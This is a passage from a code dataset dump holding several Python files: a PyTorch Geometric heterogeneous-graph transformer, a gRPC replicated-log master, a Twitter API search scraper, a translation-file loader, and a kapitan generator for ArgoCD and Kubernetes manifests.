re\nimport copy\nimport warnings\nfrom collections import defaultdict, deque\n\nimport torch\nfrom torch.nn import Module\n\nfrom torch_geometric.nn.fx import Transformer\n\ntry:\n from torch.fx import GraphModule, Graph, Node\nexcept ImportError:\n GraphModule = Graph = Node = None\n\n# TODO:\n# * LazyInitialization - Bug: LazyLinear.weight does not support deepcopy yet\n\n\ndef to_hetero(module: Module, metadata: Metadata, aggr: str = \"sum\",\n input_map: Optional[Dict[str, str]] = None,\n debug: bool = False) -> GraphModule:\n r\"\"\"Converts a homogeneous GNN model into its heterogeneous equivalent in\n which node representations are learned for each node type\n :obj:`metadata[0]`, and messages are exchanged between edge type\n :obj:`metadata[1]`, as denoted in the `\"Modeling Relational Data with Graph\n Convolutional Networks\" `_ paper:\n\n .. code-block:: python\n\n import torch\n from torch_geometric.nn import SAGEConv, to_hetero\n\n Net(torch.nn.Module):\n def __init__(self):\n self.lin = Linear(16, 16)\n self.conv = SAGEConv(16, 16)\n\n def forward(self, x, edge_index):\n x = self.lin(x)\n h = self.conv(x, edge_index)\n return torch.cat([x, h], dim=-1)\n\n model = Net()\n\n metadata = (\n ['paper', 'author'],\n [('paper' 'written_by', 'author'), ('author', 'writes', 'paper')],\n )\n\n model = to_hetero(model, metadata)\n model(x_dict, edge_index_dict)\n\n where :obj:`x_dict` and :obj:`edge_index_dict` denote dictionaries that\n hold node features and edge connectivity information for each node type and\n edge type, respectively.\n\n Args:\n module (torch.nn.Module): The homogeneous model to transform.\n metadata (Tuple[List[str], List[Tuple[str, str, str]]]): The metadata\n of the heterogeneous graph, *i.e.* its node and edge types given\n by a list of strings and a list of string triplets, respectively.\n See :meth:`torch_geometric.data.HeteroData.metadata` for more\n information.\n aggr (string, optional): The aggregation scheme to use for grouping\n node embeddings generated by different relations.\n (:obj:`\"sum\"`, :obj:`\"mean\"`, :obj:`\"min\"`, :obj:`\"max\"`,\n :obj:`\"mul\"`). 
(default: :obj:`\"sum\"`)\n input_map (Dict[str, str], optional): A dictionary holding information\n on the type of input arguments of :obj:`module.forward`.\n In case :obj:`arg` is a node-level argument, then\n :obj:`input_map[key] = 'node'`, and :obj:`input_map[key] = 'edge'`\n otherwise.\n In case :obj:`input_map` is not further specified, will try to\n automatically determine the correct type of input arguments.\n (default: :obj:`None`)\n debug: (bool, optional): If set to :obj:`True`, will perform\n transformation in debug mode. (default: :obj:`False`)\n \"\"\"\n transformer = ToHeteroTransformer(module, metadata, aggr, input_map, debug)\n return transformer.transform()\n\n\nclass ToHeteroTransformer(Transformer):\n\n aggrs = {\n 'sum': torch.add,\n 'mean': torch.add,\n 'max': torch.max,\n 'min': torch.min,\n 'mul': torch.mul,\n }\n\n def __init__(\n self,\n module: Module,\n metadata: Metadata,\n aggr: str = 'sum',\n input_map: Optional[Dict[str, str]] = None,\n debug: bool = False,\n ):\n super().__init__(module, debug)\n self.metadata = metadata\n self.aggr = aggr\n self.input_map = input_map or {}\n assert len(metadata) == 2\n assert len(metadata[0]) > 1 and len(metadata[1]) > 1\n assert aggr in self.aggrs.keys()\n\n def placeholder(self, node: Node, target: Any, name: str):\n # Add a `get` call to the input dictionary for every node-type or\n # edge-type.\n\n input_type = self.input_map.get(name, None)\n if input_type is None and bool(re.search('(edge|adj)', name)):\n input_type = 'edge'\n is_edge_level_placeholder = input_type == 'edge'\n\n if node.type is not None:\n Type = EdgeType if is_edge_level_placeholder else NodeType\n node.type = Dict[Type, node.type]\n\n self.graph.inserting_after(node)\n for key in self.metadata[int(is_edge_level_placeholder)]:\n out = self.graph.create_node('call_method', target='get',\n args=(node, key),\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def get_attr(self, node: Node, target: Any, name: str):\n raise NotImplementedError\n\n def call_message_passing_module(self, node: Node, target: Any, name: str):\n # Add calls to edge type-wise `MessagePassing` modules and aggregate\n # the outputs to node type-wise embeddings afterwards.\n\n # Group edge-wise keys per destination:\n key_name, keys_per_dst = {}, defaultdict(list)\n for key in self.metadata[1]:\n keys_per_dst[key[-1]].append(key)\n key_name[key] = f'{name}__{key[-1]}{len(keys_per_dst[key[-1]])}'\n\n for dst, keys in dict(keys_per_dst).items():\n # In case there is only a single edge-wise connection, there is no\n # need for any destination-wise aggregation, and we can already set\n # the intermediate variable name to the final output name.\n if len(keys) == 1:\n key_name[keys[0]] = f'{name}__{dst}'\n del keys_per_dst[dst]\n\n self.graph.inserting_after(node)\n for key in self.metadata[1]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_module',\n target=f'{target}.{key2str(key)}',\n args=args, kwargs=kwargs,\n name=key_name[key])\n self.graph.inserting_after(out)\n\n # Perform destination-wise aggregation.\n # Here, we aggregate in pairs, popping the first two elements of\n # `keys_per_dst` and append the result to the list.\n for dst, keys in keys_per_dst.items():\n queue = deque([key_name[key] for key in keys])\n i = len(queue) + 1\n while len(queue) >= 2:\n key1, key2 = queue.popleft(), queue.popleft()\n args = (self.find_by_name(key1), self.find_by_name(key2))\n\n new_name = f'{name}__{dst}'\n if self.aggr == 'mean' or 
len(queue) > 2:\n                    new_name += f'{i}'\n\n                out = self.graph.create_node('call_function',\n                                             target=self.aggrs[self.aggr],\n                                             args=args, name=new_name)\n                self.graph.inserting_after(out)\n                queue.append(new_name)\n                i += 1\n\n            if self.aggr == 'mean':\n                key = queue.popleft()\n                out = self.graph.create_node(\n                    'call_function', target=torch.div,\n                    args=(self.find_by_name(key), len(keys_per_dst[dst])),\n                    name=f'{name}__{dst}')\n                self.graph.inserting_after(out)\n\n    def call_module(self, node: Node, target: Any, name: str):\n        # Add calls to node type-wise or edge type-wise modules.\n        self.graph.inserting_after(node)\n        for key in self.metadata[int(self.has_edge_level_arg_kwarg(node))]:\n            args, kwargs = self.map_args_kwargs(node, key)\n            out = self.graph.create_node('call_module',\n                                         target=f'{target}.{key2str(key)}',\n                                         args=args, kwargs=kwargs,\n                                         name=f'{name}__{key2str(key)}')\n            self.graph.inserting_after(out)\n\n    def call_method(self, node: Node, target: Any, name: str):\n        # Add calls to node type-wise or edge type-wise methods.\n        self.graph.inserting_after(node)\n        for key in self.metadata[int(self.has_edge_level_arg_kwarg(node))]:\n            args, kwargs = self.map_args_kwargs(node, key)\n            out = self.graph.create_node('call_method', target=target,\n                                         args=args, kwargs=kwargs,\n                                         name=f'{name}__{key2str(key)}')\n            self.graph.inserting_after(out)\n\n    def call_function(self, node: Node, target: Any, name: str):\n        # Add calls to node type-wise or edge type-wise functions.\n        self.graph.inserting_after(node)\n        for key in self.metadata[int(self.has_edge_level_arg_kwarg(node))]:\n            args, kwargs = self.map_args_kwargs(node, key)\n            out = self.graph.create_node('call_function', target=target,\n                                         args=args, kwargs=kwargs,\n                                         name=f'{name}__{key2str(key)}')\n            self.graph.inserting_after(out)\n\n    def output(self, node: Node, target: Any, name: str):\n        # Replace the output by dictionaries, holding either node type-wise or\n        # edge type-wise data.\n        def _recurse(value: Any) -> Any:\n            if isinstance(value, Node):\n                return {\n                    key: self.find_by_name(f'{value.name}__{key2str(key)}')\n                    for key in self.metadata[int(self.is_edge_level(value))]\n                }\n            elif isinstance(value, dict):\n                return {k: _recurse(v) for k, v in value.items()}\n            elif isinstance(value, list):\n                return [_recurse(v) for v in value]\n            elif isinstance(value, tuple):\n                return tuple(_recurse(v) for v in value)\n            else:\n                return value\n\n        if node.type is not None and isinstance(node.args[0], Node):\n            output = node.args[0]\n            Type = EdgeType if self.is_edge_level(output) else NodeType\n            node.type = Dict[Type, node.type]\n        else:\n            node.type = None\n\n        node.args = (_recurse(node.args[0]), )\n\n    def init_submodule(self, module: Module, target: str) -> Module:\n        # Replicate each module for each node type or edge type.\n        has_edge_level_target = bool(\n            self.find_by_target(f'{target}.{key2str(self.metadata[1][0])}'))\n\n        module_dict = torch.nn.ModuleDict()\n        for key in self.metadata[int(has_edge_level_target)]:\n            module_dict[key2str(key)] = copy.deepcopy(module)\n            if hasattr(module, 'reset_parameters'):\n                module_dict[key2str(key)].reset_parameters()\n            elif sum([p.numel() for p in module.parameters()]) > 0:\n                warnings.warn((f\"'{target}' will be duplicated, but its \"\n                               f\"parameters cannot be reset\"))\n        return module_dict\n\n    # Helper methods ##########################################################\n\n    def map_args_kwargs(self, node: Node,\n                        key: Union[NodeType, EdgeType]) -> Tuple[Tuple, Dict]:\n        def _recurse(value: Any) -> Any:\n            if isinstance(value, Node):\n                out = 
self.find_by_name(f'{value.name}__{key2str(key)}')\n if out is None and isinstance(key, tuple):\n out = (self.find_by_name(f'{value.name}__{key[0]}'),\n self.find_by_name(f'{value.name}__{key[-1]}'))\n return out\n elif isinstance(value, dict):\n return {k: _recurse(v) for k, v in value.items()}\n elif isinstance(value, list):\n return [_recurse(v) for v in value]\n elif isinstance(value, tuple):\n return tuple(_recurse(v) for v in value)\n else:\n return value\n\n args = tuple(_recurse(v) for v in node.args)\n kwargs = {k: _recurse(v) for k, v in node.kwargs.items()}\n return args, kwargs\n\n def is_edge_level(self, node: Node) -> bool:\n key = self.metadata[1][0]\n return bool(self.find_by_name(f'{node.name}__{key2str(key)}'))\n\n def has_edge_level_arg_kwarg(self, node: Node) -> bool:\n def _recurse(value: Any) -> bool:\n if isinstance(value, Node):\n return self.is_edge_level(value)\n elif isinstance(value, dict):\n return any([_recurse(v) for v in value.values()])\n elif isinstance(value, (list, tuple)):\n return any([_recurse(v) for v in value])\n else:\n return False\n\n has_edge_level_arg = any([_recurse(value) for value in node.args])\n has_edge_level_kwarg = any([_recurse(v) for v in node.kwargs.values()])\n return has_edge_level_arg or has_edge_level_kwarg\n\n\ndef key2str(key: Union[NodeType, EdgeType]) -> str:\n return '__'.join(key) if isinstance(key, tuple) else key\n","sub_path":"torch_geometric/nn/to_hetero.py","file_name":"to_hetero.py","file_ext":"py","file_size_in_byte":13227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254738745","text":"import os\r\nimport grpc\r\nimport ReplicatedLog_pb2\r\nimport ReplicatedLog_pb2_grpc\r\nfrom concurrent import futures\r\n\r\nlogs = []\r\nslave_host = os.getenv('SLAVE_HOST', 'localhost')\r\nclass Logger(ReplicatedLog_pb2_grpc.PostRequestServiceServicer):\r\n def PostRequest(self, request, context):\r\n logs.append(request.msg)\r\n with grpc.insecure_channel(f'{slave_host}:50052') as channel:\r\n client = ReplicatedLog_pb2_grpc.PostRequestServiceStub(channel)\r\n slave_request = ReplicatedLog_pb2.POST(msg=request.msg)\r\n if client.PostRequest(slave_request).msg == '1':\r\n return ReplicatedLog_pb2.POSTResponse(msg='Master and Slaves have recived msg')\r\n\r\nclass SendLogs(ReplicatedLog_pb2_grpc.GetRequestServiceServicer):\r\n def GetRequest(self, request, context):\r\n with grpc.insecure_channel(f'{slave_host}:50052') as channel:\r\n client = ReplicatedLog_pb2_grpc.GetRequestServiceStub(channel)\r\n slave_request = ReplicatedLog_pb2.GET(msg='1')\r\n\r\n return ReplicatedLog_pb2.GETResponse(data=client.GetRequest(slave_request).data)\r\n\r\ndef serve():\r\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=2))\r\n ReplicatedLog_pb2_grpc.add_PostRequestServiceServicer_to_server(Logger(), server)\r\n ReplicatedLog_pb2_grpc.add_GetRequestServiceServicer_to_server(SendLogs(), server)\r\n server.add_insecure_port(\"[::]:50051\")\r\n server.start()\r\n server.wait_for_termination()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n serve()\r\n","sub_path":"Master.py","file_name":"Master.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"77344604","text":"import requests # Para enviar solicitudes GET desde la API\nimport os # Para guardar los tokens de acceso y para la gestión de archivos al crear y añadir al conjunto de datos\nimport pandas as pd # Para mostrar los datos 
después\n# Para parsear las fechas recibidas de twitter en formatos legibles\nimport dateutil.parser\nimport claves #Importar claves\nimport time\n\nCONSUMER_KEY = claves.CONSUMER_KEY\nCONSUMER_SECRET = claves.CONSUMER_SECRET\nBEARER_TOKEN = claves.BEARER_TOKEN\nACCESS_TOKEN = claves.ACCESS_TOKEN\nACCESS_TOKEN_SECRET = claves.ACCESS_TOKEN_SECRET\n\n# guardaremos el token en una \"variable de entorno\"\nos.environ['TOKEN'] = BEARER_TOKEN\n\n#crearemos nuestra función auth () , que recupera el token del entorno\ndef auth():\n return os.getenv('TOKEN')\n\n#A continuación, definiremos una función que tomará nuestro token de portador, \n#lo pasará para su autorización y devolverá los encabezados que usaremos para acceder a la API.\ndef create_headers(bearer_token):\n headers = {\"Authorization\": \"Bearer {}\".format(bearer_token)}\n return headers\n\n# Ahora que podemos acceder a la API, crearemos la solicitud para el punto final que vamos a usar y los parámetros que queremos pasar.\ndef create_url(keyword, start_date, end_date, max_results=500):\n \n #Cuál es el enlace del endpoint al que queremos acceder para recoger datos\n search_url = \"https://api.twitter.com/2/tweets/search/all\"\n\n \"\"\"Los parámetros que ofrece el endpoint y que podemos usar para personalizar la solicitud que queremos enviar.\"\"\"\n \n query_params = {'query': keyword, \n 'start_time': start_date, #AAAA-MM-DDTHH: mm: ssZ (ISO 8601 / RFC 3339)\n 'end_time': end_date, ##AAAA-MM-DDTHH: mm: ssZ (ISO 8601 / RFC 3339)\n 'max_results': max_results, #El número de resultados de búsqueda devueltos por una solicitud está limitado entre 10 y 500 resultados.\n 'expansions': 'author_id,in_reply_to_user_id,geo.place_id',\n 'tweet.fields': 'id,text,author_id,in_reply_to_user_id,geo,conversation_id,created_at,lang,public_metrics,referenced_tweets,reply_settings,source',\n 'user.fields': 'id,name,username,created_at,description,public_metrics,verified',\n 'place.fields': 'full_name,id,country,country_code,geo,name,place_type',\n 'next_token': {}}\n return (search_url, query_params)\n\n#Ahora que tenemos la URL, los encabezados y los parámetros que queremos, crearemos una función que unirá todo esto y se conectará al punto final.\n#La función a continuación enviará la solicitud \"GET\" y si todo es correcto (código de respuesta 200), devolverá la respuesta en formato \"JSON\".\ndef connect_to_endpoint(url, headers, params, next_token = None): #next_token está configurado en \"Ninguno\" de forma predeterminada, ya que solo nos importa si existe.\n params['next_token'] = next_token #objeto params recibido de la función create_url\n response = requests.request(\"GET\", url, headers = headers, params = params)\n print(\"Endpoint Response Code: \" + str(response.status_code))\n if response.status_code != 200:\n raise Exception(response.status_code, response.text)\n return response.json()\n\ndef create_df(json_response): # Función para crear df de respuesta a partir del json \n res = []\n #Recorrer en bucle cada uno de los tweets del json\n for tweet in json_response['data']:\n \n # creará una variable para cada uno ya que algunas de las claves podrían no existir para algunos tweets\n\n # 1. Author ID\n if ('author_id' in tweet): \n author_id = tweet['author_id']\n else:\n author_id = \" \"\n \n # 2. Time created\n if ('created_at' in tweet): \n created_at = dateutil.parser.parse(tweet['created_at'])\n else:\n created_at = \" \"\n \n # 3. 
Geolocation\n        if ('geo' in tweet):\n            geo = tweet['geo']['place_id']\n        else:\n            geo = \" \"\n\n        # 4. Tweet ID\n        if ('id' in tweet):\n            tweet_id = tweet['id']\n        else:\n            tweet_id = \" \"\n\n        # 5. Language\n        if ('lang' in tweet):\n            lang = tweet['lang']\n        else:\n            lang = \" \"\n\n        # 6. Tweet metrics\n        if ('public_metrics' in tweet):\n            retweet_count = tweet['public_metrics']['retweet_count']\n        else:\n            retweet_count = \" \"\n\n        if ('public_metrics' in tweet):\n            reply_count = tweet['public_metrics']['reply_count']\n        else:\n            reply_count = \" \"\n\n        if ('public_metrics' in tweet):\n            like_count = tweet['public_metrics']['like_count']\n        else:\n            like_count = \" \"\n\n        if ('public_metrics' in tweet):\n            quote_count = tweet['public_metrics']['quote_count']\n        else:\n            quote_count = \" \"\n\n        # 7. source\n        if ('source' in tweet):\n            source = tweet['source']\n        else:\n            source = \" \"\n\n        # 8. Tweet text\n        if ('text' in tweet):\n            text = tweet['text']\n        else:\n            text = \" \"\n\n        # Reunir todos los datos en una lista\n        res.append([author_id, created_at, geo, tweet_id, lang, like_count, quote_count, reply_count, retweet_count, source, text])\n\n    df_res = pd.DataFrame(data = res, columns=['author id', 'created_at', 'geo', 'id','lang', 'like_count', 'quote_count', 'reply_count','retweet_count','source','tweet'])\n    # Imprime el número de tweets de esta iteración\n    return df_res\n\ndef create_df_final(url, headers, json_response): #función para obtener todos los tweets de cada consulta\n    df_res = create_df(json_response) #paso como parámetro\n    print(\"Número de Tweets añadidos de esta respuesta: \",len(df_res))\n    while 'next_token' in json_response[\"meta\"]:\n        # Guarda el token para usarlo en la siguiente llamada\n        next_token = json_response['meta']['next_token']\n        if ('data' in json_response) and len(df_res)< 499500:\n            json_response = connect_to_endpoint(url[0], headers, url[1], next_token)\n            df_aux = create_df(json_response)\n            df_res = pd.concat([df_res,df_aux])\n            time.sleep(2) #Se agrega un time.sleep () entre llamadas para asegurarse de que no solo está enviando spam a la API con solicitudes.\n            print(\"Número de Tweets añadidos de esta respuesta: \",len(df_res))\n        else:\n            break\n    return df_res\n","sub_path":"twitter_api.py","file_name":"twitter_api.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"29870122","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    severus.language\n    ----------------\n\n    Provides language data wrapper.\n\n    :copyright: 2020 Giovanni Barillari\n    :license: BSD-3-Clause\n\"\"\"\n\nfrom __future__ import annotations\n\nimport json\nimport re\n\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Optional, Tuple, Union\nfrom yaml import SafeLoader as ymlLoader, load as ymlload\n\nfrom .datastructures import GroupData\n\n\nclass Language:\n    __slots__ = ['_sources', '_strings', '_groups', '_encoding', 'get']\n    _re_nkey = re.compile(r'n\\d+')\n\n    def __init__(\n        self,\n        data_path: Path,\n        encoding: str = 'utf8',\n        filename_prefix: bool = True,\n        watch_changes: bool = False\n    ):\n        self._sources: List[Dict[str, Any]] = []\n        self._strings: Dict[str, str] = {}\n        self._groups: Dict[Union[int, str], str] = {}\n        self._encoding: str = encoding\n        self.get = self._get_reload if watch_changes else self._get_static\n        self._load_sources(data_path, filename_prefix)\n\n    def _build_key(self, key: str, prefix: Optional[str] = None):\n        return f'{prefix}.{key}' if prefix else key\n\n    def _load_sources(\n        self,\n        path: 
Path,\n filename_prefix: bool = True\n ):\n sources, filename_prefix_applicable = [], False\n if path.is_dir():\n filename_prefix_applicable = filename_prefix\n for file_path in path.iterdir():\n if file_path.suffix in [\n '.json', '.yml', '.yaml'\n ]:\n sources.append(file_path)\n elif path.is_file():\n sources.append(path)\n for source in sources:\n self._sources.append({\n 'path': source,\n 'mtime': source.stat().st_mtime,\n 'prefix': filename_prefix_applicable\n })\n self._load_source(source, filename_prefix_applicable)\n\n def _load_source(\n self,\n path: Path,\n filename_prefix: bool = False\n ):\n ext = path.suffix\n if ext == '.json':\n with path.open(\"rt\", encoding=self._encoding) as f:\n data = json.loads(f.read())\n elif ext in ['.yml', '.yaml']:\n with path.open(\"rt\", encoding=self._encoding) as f:\n data = ymlload(f.read(), Loader=ymlLoader)\n else:\n raise RuntimeError(f'Invalid source format: {path}')\n prefix = filename_prefix and path.stem or None\n self._load_data(data, prefix)\n\n def _load_data(\n self,\n data: Dict[str, Union[Dict, str]],\n prefix: Optional[str] = None\n ):\n for key, val in data.items():\n if isinstance(val, str):\n self._strings[self._build_key(key, prefix)] = val\n continue\n keyset = set(val.keys()) - {'_'}\n if len(self._re_nkey.findall(','.join(keyset))) == len(keyset):\n self._groups[self._build_key(key, prefix)] = GroupData(val)\n else:\n self._load_data(val, self._build_key(key, prefix))\n\n def _ensure_updated_sources(self):\n for source in self._sources:\n mtime = source['path'].stat().st_mtime\n if mtime != source['mtime']:\n source['mtime'] = mtime\n self._load_source(source['path'], source['prefix'])\n\n def _get_reload(self, text: str) -> Tuple[str, Dict[int, str]]:\n self._ensure_updated_sources()\n return self._strings.get(text, text), self._groups.get(text, {})\n\n def _get_static(self, text: str) -> Tuple[str, Dict[int, str]]:\n return self._strings.get(text, text), self._groups.get(text, {})\n","sub_path":"severus/language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"283628913","text":"import base64\nimport hashlib\nimport os\n\nfrom kapitan.cached import args\nfrom kapitan.inputs.kadet import BaseObj, inventory\nfrom kapitan.utils import render_jinja2_file\n\nsearch_paths = args.get(\"search_paths\")\n\nfrom . 
import k8s\n\n\ndef j2(filename, ctx):\n return render_jinja2_file(filename, ctx, search_paths=search_paths)\n\n\ninv = inventory(lazy=True)\n\n\ndef merge(source, destination):\n for key, value in source.items():\n if isinstance(value, dict):\n node = destination.setdefault(key, value)\n if node is None:\n destination[key] = value\n else:\n merge(value, node)\n else:\n destination[key] = destination.setdefault(key, value)\n\n return destination\n\n\nclass ArgoCDAppProject(k8s.Base):\n def new(self):\n self.need(\"name\")\n self.kwargs.apiVersion = \"argoproj.io/v1alpha1\"\n self.kwargs.kind = \"AppProject\"\n\n # Add a this finalizer ONLY if you want these to cascade delete\n self.kwargs.finalizers = list(\"resources-finalizer.argocd.argoproj.io\")\n super().new()\n\n def body(self):\n super().body()\n\n # You'll usually want to add your resources to the argocd namespace.\n self.add_namespace(inv.parameters.argocd_namespace)\n\n argocd_project = self.kwargs.argocd_project\n\n self.add_annotations(argocd_project.get(\"annotations\", {}))\n self.add_labels(argocd_project.get(\"labels\", {}))\n\n # Allow manifests to deploy from any Git repos\n if argocd_project.source_repos:\n self.root.spec.sourceRepos = argocd_project.source_repos\n\n # Only permit applications to deploy to the namespace in the same cluster\n if argocd_project.destinations:\n self.root.spec.destinations = argocd_project.destinations\n\n # Deny all cluster-scoped resources from being created, except for Namespace\n if argocd_project.cluster_resource_whitelist:\n self.root.spec.clusterResourceWhitelist = (\n argocd_project.cluster_resource_whitelist\n )\n\n # Allow all namespaced-scoped resources to be created, except for ResourceQuota, LimitRange, NetworkPolicy\n if argocd_project.namespace_resource_blacklist:\n self.root.spec.namespaceResourceBlacklist = (\n argocd_project.namespace_resource_blacklist\n )\n\n # Deny all namespaced-scoped resources from being created, except for Deployment and StatefulSet\n if argocd_project.namespace_resource_whitelist:\n self.root.spec.namespaceResourceWhitelist = (\n argocd_project.namespace_resource_whitelist\n )\n\n # Enables namespace orphaned resource monitoring.\n if argocd_project.orphaned_resources:\n self.root.spec.orphanedResources = argocd_project.orphaned_resources\n\n # Roles\n if argocd_project.roles:\n self.root.spec.roles = argocd_project.roles\n\n\nclass ArgoCDApplication(k8s.Base):\n def new(self):\n self.need(\"name\")\n self.kwargs.apiVersion = \"argoproj.io/v1alpha1\"\n self.kwargs.kind = \"Application\"\n\n # Add a this finalizer ONLY if you want these to cascade delete\n\n # self.kwargs.finalizers = list('resources-finalizer.argocd.argoproj.io')\n super().new()\n\n def body(self):\n super().body()\n\n # You'll usually want to add your resources to the argocd namespace.\n self.add_namespace(inv.parameters.argocd_namespace)\n\n argocd_application = self.kwargs.argocd_application\n\n self.add_annotations(argocd_application.get(\"annotations\", {}))\n self.add_labels(argocd_application.get(\"labels\", {}))\n\n # The project the argocd_application belongs to.\n self.root.spec.project = argocd_application.project\n\n # The destination in which Namespace the application should be deployed\n self.root.spec.destination = argocd_application.destination\n\n # Source of the application manifests\n if argocd_application.source:\n self.root.spec.source = argocd_application.source\n\n # Sync policy\n if argocd_application.sync_policy:\n self.root.spec.syncPolicy = 
argocd_application.sync_policy\n\n # Ignore differences at the specified json pointers\n if argocd_application.ignore_differences:\n self.root.spec.ignoreDifferences = argocd_application.ignore_differences\n\n\n# The following classes are required to generate Secrets + ConfigMaps\n# TODO: Imported from k8s-generator\nclass SharedConfig:\n \"\"\"Shared class to use for both Secrets and ConfigMaps classes.\n\n contain anything needed by both classes, so that their behavious is basically the same.\n Each subclass will then implement its own way of adding the data depending on their implementation.\n \"\"\"\n\n @staticmethod\n def encode_string(unencoded_string):\n return base64.b64encode(unencoded_string.encode(\"ascii\")).decode(\"ascii\")\n\n def setup_metadata(self):\n self.add_namespace(inv.parameters.argocd_namespace)\n self.add_annotations(self.config.annotations)\n self.add_labels(self.config.labels)\n\n self.items = self.config[\"items\"]\n try:\n if isinstance(self, ConfigMap):\n globals = (\n inv.parameters.generators.manifest.default_config.globals.config_maps\n )\n else:\n globals = (\n inv.parameters.generators.manifest.default_config.globals.secrets\n )\n self.add_annotations(globals.get(\"annotations\", {}))\n self.add_labels(globals.get(\"labels\", {}))\n except AttributeError:\n pass\n\n self.versioning(self.config.get(\"versioned\", False))\n\n def add_directory(self, directory, encode=False):\n stringdata = inv.parameters.get(\"use_tesoro\", False)\n if directory and os.path.isdir(directory):\n for filename in os.listdir(directory):\n with open(f\"{directory}/{filename}\", \"r\") as f:\n file_content = f.read()\n self.add_item(\n filename,\n file_content,\n request_encode=encode,\n stringdata=stringdata,\n )\n\n def add_data(self, data):\n stringdata = inv.parameters.get(\"use_tesoro\", False)\n\n for key, spec in data.items():\n encode = spec.get(\"b64_encode\", False)\n\n if \"value\" in spec:\n value = spec.get(\"value\")\n if \"template\" in spec:\n value = j2(spec.template, spec.get(\"values\", {}))\n if \"file\" in spec:\n with open(spec.file, \"r\") as f:\n value = f.read()\n\n self.add_item(key, value, request_encode=encode, stringdata=stringdata)\n\n def add_string_data(self, string_data, encode=False):\n stringdata = True\n\n for key, spec in string_data.items():\n\n if \"value\" in spec:\n value = spec.get(\"value\")\n if \"template\" in spec:\n value = j2(spec.template, spec.get(\"values\", {}))\n if \"file\" in spec:\n with open(spec.file, \"r\") as f:\n value = f.read()\n\n self.add_item(key, value, request_encode=encode, stringdata=stringdata)\n\n def versioning(self, enabled=False):\n if enabled:\n self.hash = hashlib.sha256(str(self.root.to_dict()).encode()).hexdigest()[\n :8\n ]\n self.root.metadata.name += f\"-{self.hash}\"\n\n\n# TODO: Imported from k8s-generator\nclass ConfigMap(k8s.Base, SharedConfig):\n def new(self):\n self.kwargs.apiVersion = \"v1\"\n self.kwargs.kind = \"ConfigMap\"\n super().new()\n\n def body(self):\n super().body()\n\n def add_item(self, key, value, request_encode=False, stringdata=False):\n encode = request_encode\n\n self.root[\"data\"][key] = self.encode_string(value) if encode else value\n\n\n# TODO: Imported from k8s-generator\nclass ComponentConfig(ConfigMap, SharedConfig):\n def new(self):\n super().new()\n self.need(\"config\")\n\n def body(self):\n super().body()\n self.config = self.kwargs.config\n\n self.setup_metadata()\n self.add_data(self.config.data)\n self.add_directory(self.config.directory, 
encode=False)\n\n\nclass Secret(k8s.Base):\n def new(self):\n self.kwargs.apiVersion = \"v1\"\n self.kwargs.kind = \"Secret\"\n super().new()\n\n def body(self):\n super().body()\n\n def add_item(self, key, value, request_encode=False, stringdata=False):\n encode = not stringdata and request_encode\n field = \"stringData\" if stringdata else \"data\"\n self.root[field][key] = self.encode_string(value) if encode else value\n\n\nclass ComponentSecret(Secret, SharedConfig):\n def new(self):\n super().new()\n self.need(\"config\")\n\n def body(self):\n super().body()\n self.config = self.kwargs.config\n self.root.type = self.config.get(\"type\", \"Opaque\")\n\n self.setup_metadata()\n if self.config.data:\n self.add_data(self.config.data)\n if self.config.string_data:\n self.add_string_data(self.config.string_data)\n self.add_directory(self.config.directory, encode=True)\n\n\n# This function renderes an ArgoCD-AppProject\ndef generate_argocd_appproject(input_params):\n obj = BaseObj()\n bundle = list()\n argocd_projects = inv.parameters.argocd_projects\n for name in argocd_projects.keys():\n argocd_project = ArgoCDAppProject(\n name=name, argocd_project=argocd_projects[name]\n )\n\n obj.root[\"{}-argo-appproject\".format(name)] = argocd_project\n\n return obj\n\n\n# This function renderes an ArgoCD-Application\ndef generate_argocd_application(input_params):\n obj = BaseObj()\n bundle = list()\n argocd_applications = inv.parameters.argocd_applications\n for name in argocd_applications.keys():\n argocd_application = ArgoCDApplication(\n name=name, argocd_application=argocd_applications[name]\n )\n\n obj.root[\"{}-argo-application\".format(name)] = argocd_application\n\n return obj\n\n\n# This function renderes an Shared-ConfigMaps + Secrets\ndef generate_resource_manifests(input_params):\n obj = BaseObj()\n\n for secret_name, secret_spec in inv.parameters.generators.argocd.secrets.items():\n name = secret_spec.get(\"name\", secret_name)\n secret = ComponentSecret(name=name, config=secret_spec)\n obj.root[f\"{name}\"] = secret\n\n for config_name, config_spec in inv.parameters.generators.argocd.configs.items():\n name = config_spec.get(\"name\", config_name)\n config = ComponentConfig(name=name, config=config_spec)\n obj.root[f\"{name}\"] = config\n\n return obj\n\n\n# This function renderes all previous defined functions and returns\ndef generate_manifests(input_params):\n all_manifests = BaseObj()\n\n argocd_project_manifests = generate_argocd_appproject(input_params)\n argocd_application_manifests = generate_argocd_application(input_params)\n resource_manifests = generate_resource_manifests(input_params)\n\n all_manifests.root.update(argocd_project_manifests.root)\n all_manifests.root.update(argocd_application_manifests.root)\n all_manifests.root.update(resource_manifests.root)\n\n return all_manifests\n\n\ndef main(input_params):\n whitelisted_functions = [\"generate_manifests\"]\n function = input_params.get(\"function\", \"generate_manifests\")\n if function in whitelisted_functions:\n return globals()[function](input_params)\n","sub_path":"components/generators/argocd/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"360408443","text":"# -*- coding: utf-8 -*- #\n# Copyright 2016 Google Inc. 
